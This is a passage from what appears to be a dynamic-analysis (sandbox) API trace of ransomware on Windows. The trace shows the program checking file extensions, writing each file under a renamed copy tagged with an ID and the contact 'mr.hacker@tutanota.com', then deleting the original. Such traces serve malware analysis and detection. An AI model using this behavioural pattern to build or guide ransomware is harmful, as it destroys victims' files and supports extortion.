returned -1 [0049.228] lstrlenW (lpString=".pdf") returned 4 [0049.228] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.228] lstrlenW (lpString=".xls") returned 4 [0049.228] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.228] lstrlenW (lpString=".xlsx") returned 5 [0049.228] lstrcmpiW (lpString1=".xlsx", lpString2="8.CHM") returned -1 [0049.228] lstrlenW (lpString=".ppt") returned 4 [0049.228] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.228] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0049.228] lstrlenW (lpString=".zip") returned 4 [0049.228] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.228] lstrlenW (lpString=".rar") returned 4 [0049.229] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.229] lstrlenW (lpString=".bz2") returned 4 [0049.229] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.229] lstrlenW (lpString=".7z") returned 3 [0049.229] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0049.229] lstrlenW (lpString=".dbf") returned 4 [0049.229] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0049.229] lstrlenW (lpString=".1cd") returned 4 [0049.229] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0049.229] lstrlenW (lpString=".jpg") returned 4 [0049.229] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.229] lstrcmpiW (lpString1=".CHM", lpString2=".USA") returned -1 [0049.229] lstrlenW (lpString="VBHW6.CHM") returned 9 [0049.229] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0049.229] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=58026) returned 1 [0049.229] CloseHandle (hObject=0x208) returned 1 [0049.230] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm")) returned 0x20 [0049.230] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0049.230] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0049.230] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.230] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.230] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0049.230] GetLastError () returned 0x0 [0049.230] ReadFile (in: hFile=0x208, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0xe2aa, lpOverlapped=0x0) returned 1 [0049.234] WriteFile (in: hFile=0x1f4, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xe2b0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xe2b0, lpOverlapped=0x0) returned 1 [0049.238] ReadFile (in: hFile=0x208, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0049.238] WriteFile (in: hFile=0x1f4, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0049.238] SetEndOfFile (hFile=0x1f4) returned 1 [0049.238] CloseHandle (hObject=0x1f4) returned 1 [0049.238] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.238] SetEndOfFile (hFile=0x208) returned 1 [0049.239] CloseHandle (hObject=0x208) returned 1 [0049.240] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0049.240] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm")) returned 1 [0049.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0049.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0049.240] lstrlenW (lpString=".doc") returned 4 [0049.240] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.240] lstrlenW (lpString=".docx") returned 5 [0049.240] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0049.240] lstrlenW (lpString=".pdf") returned 4 [0049.240] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.240] lstrlenW (lpString=".xls") returned 4 [0049.240] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.240] lstrlenW (lpString=".xlsx") returned 5 [0049.240] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0049.240] lstrlenW (lpString=".ppt") returned 4 [0049.240] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0049.240] lstrlenW (lpString=".zip") returned 4 [0049.240] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.240] lstrlenW (lpString=".rar") returned 4 [0049.240] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.240] lstrlenW (lpString=".bz2") returned 4 [0049.241] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.241] lstrlenW (lpString=".7z") returned 3 [0049.241] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0049.241] lstrlenW (lpString=".dbf") returned 4 [0049.241] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0049.241] lstrlenW (lpString=".1cd") returned 4 [0049.241] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0049.241] lstrlenW (lpString=".jpg") returned 4 [0049.241] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0049.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0049.241] lstrlenW (lpString=".doc") returned 4 [0049.241] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.241] lstrlenW (lpString=".docx") returned 5 [0049.241] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0049.241] lstrlenW (lpString=".pdf") returned 4 [0049.241] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.241] lstrlenW (lpString=".xls") returned 4 [0049.241] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.241] lstrlenW (lpString=".xlsx") returned 5 [0049.241] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0049.241] lstrlenW (lpString=".ppt") returned 4 [0049.241] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0049.241] lstrlenW (lpString=".zip") returned 4 [0049.241] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.241] lstrlenW (lpString=".rar") returned 4 [0049.242] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.242] lstrlenW (lpString=".bz2") returned 4 [0049.242] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.242] lstrlenW (lpString=".7z") returned 3 [0049.242] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0049.242] lstrlenW (lpString=".dbf") returned 4 [0049.242] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0049.242] lstrlenW (lpString=".1cd") returned 4 [0049.242] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0049.242] lstrlenW (lpString=".jpg") returned 4 [0049.242] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.242] lstrcmpiW (lpString1=".CHM", lpString2=".USA") returned -1 [0049.242] lstrlenW (lpString="VBLR6.CHM") returned 9 [0049.242] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0049.242] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=944994) returned 1 [0049.243] CloseHandle (hObject=0x208) returned 1 [0049.243] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm")) returned 0x20 [0049.243] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0049.243] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0049.243] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.243] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.243] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0049.243] GetLastError () returned 0x0 [0049.243] ReadFile (in: hFile=0x208, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0xe6b62, lpOverlapped=0x0) returned 1 [0049.456] WriteFile (in: hFile=0x1f4, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xe6b70, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xe6b70, lpOverlapped=0x0) returned 1 [0049.470] ReadFile (in: hFile=0x208, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0049.470] WriteFile (in: hFile=0x1f4, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0049.470] SetEndOfFile (hFile=0x1f4) returned 1 [0049.470] CloseHandle (hObject=0x1f4) returned 1 [0049.470] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0049.470] SetEndOfFile (hFile=0x208) returned 1 [0049.478] CloseHandle (hObject=0x208) returned 1 [0049.478] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0049.478] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm")) returned 1 [0049.478] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.478] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.478] lstrlenW (lpString=".doc") returned 4 [0049.478] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.478] lstrlenW (lpString=".docx") returned 5 [0049.478] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0049.478] lstrlenW (lpString=".pdf") returned 4 [0049.478] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.478] lstrlenW (lpString=".xls") returned 4 [0049.478] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.478] lstrlenW (lpString=".xlsx") returned 5 [0049.479] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0049.479] lstrlenW (lpString=".ppt") returned 4 [0049.479] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.479] lstrlenW (lpString=".zip") returned 4 [0049.479] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.479] lstrlenW (lpString=".rar") returned 4 [0049.479] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.479] lstrlenW (lpString=".bz2") returned 4 [0049.479] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.479] lstrlenW (lpString=".7z") returned 3 [0049.479] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.479] lstrlenW (lpString=".dbf") returned 4 [0049.479] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.479] lstrlenW (lpString=".1cd") returned 4 [0049.479] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.479] lstrlenW (lpString=".jpg") returned 4 [0049.479] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.479] lstrlenW (lpString=".doc") returned 4 [0049.479] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.479] lstrlenW (lpString=".docx") returned 5 [0049.479] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0049.479] lstrlenW (lpString=".pdf") returned 4 [0049.479] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.479] lstrlenW (lpString=".xls") returned 4 [0049.479] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.479] lstrlenW (lpString=".xlsx") returned 5 [0049.479] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0049.479] lstrlenW (lpString=".ppt") returned 4 [0049.479] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.480] lstrlenW (lpString=".zip") returned 4 [0049.480] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.480] lstrlenW (lpString=".rar") returned 4 [0049.480] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.480] lstrlenW (lpString=".bz2") returned 4 [0049.480] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.480] lstrlenW (lpString=".7z") returned 3 [0049.480] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.480] lstrlenW (lpString=".dbf") returned 4 [0049.480] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.480] lstrlenW (lpString=".1cd") returned 4 [0049.480] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.480] lstrlenW (lpString=".jpg") returned 4 [0049.480] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.480] lstrcmpiW (lpString1=".png", lpString2=".USA") returned -1 [0049.480] lstrlenW (lpString="16to9Squareframe_Buttongraphic.png") returned 34 [0049.480] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0050.325] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=10123) returned 1 [0050.325] CloseHandle (hObject=0x204) returned 1 [0050.325] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png")) returned 0x20 [0050.325] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0050.325] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0050.325] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0050.325] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0050.325] lstrlenW (lpString=".doc") returned 4 [0050.325] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0050.325] lstrlenW (lpString=".docx") returned 5 [0050.325] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1 [0050.326] lstrlenW (lpString=".pdf") returned 4 [0050.326] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0050.326] lstrlenW (lpString=".xls") returned 4 [0050.326] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0050.326] lstrlenW (lpString=".xlsx") returned 5 [0050.326] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1 [0050.326] lstrlenW (lpString=".ppt") returned 4 [0050.326] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0050.326] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0050.326] lstrlenW (lpString=".zip") returned 4 [0050.326] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0050.326] lstrlenW (lpString=".rar") returned 4 [0050.326] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0050.326] lstrlenW (lpString=".bz2") returned 4 [0050.326] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0050.326] lstrlenW (lpString=".7z") returned 3 [0050.326] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0050.326] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0050.326] lstrlenW (lpString=".dbf") returned 4 [0050.326] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0050.326] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0050.326] lstrlenW (lpString=".1cd") returned 4 [0050.326] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0050.326] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0050.326] lstrlenW (lpString=".jpg") returned 4 [0050.326] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0050.326] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0050.326] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0050.326] lstrlenW (lpString=".doc") returned 4 [0050.326] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0050.326] lstrlenW (lpString=".docx") returned 5 [0050.326] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1 [0050.326] lstrlenW (lpString=".pdf") returned 4 [0050.326] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0050.326] lstrlenW (lpString=".xls") returned 4 [0050.326] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0050.327] lstrlenW (lpString=".xlsx") returned 5 [0050.327] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1 [0050.327] lstrlenW (lpString=".ppt") returned 4 [0050.327] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0050.327] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0050.327] lstrlenW (lpString=".zip") returned 4 [0050.327] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0050.327] lstrlenW (lpString=".rar") returned 4 [0050.327] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0050.327] lstrlenW (lpString=".bz2") returned 4 [0050.327] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0050.327] lstrlenW (lpString=".7z") returned 3 [0050.327] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0050.327] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0050.327] lstrlenW (lpString=".dbf") returned 4 [0050.327] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0050.327] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0050.327] lstrlenW (lpString=".1cd") returned 4 [0050.327] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0050.327] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0050.327] lstrlenW (lpString=".jpg") returned 4 [0050.327] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0050.327] lstrcmpiW (lpString1=".png", lpString2=".USA") returned -1 [0050.327] lstrlenW (lpString="btn-back-static.png") returned 19 [0050.327] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-back-static.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0050.703] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=10888) returned 1 [0050.703] CloseHandle (hObject=0x1a0) returned 1 [0050.703] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png" (normalized: "c:\\program files\\dvd 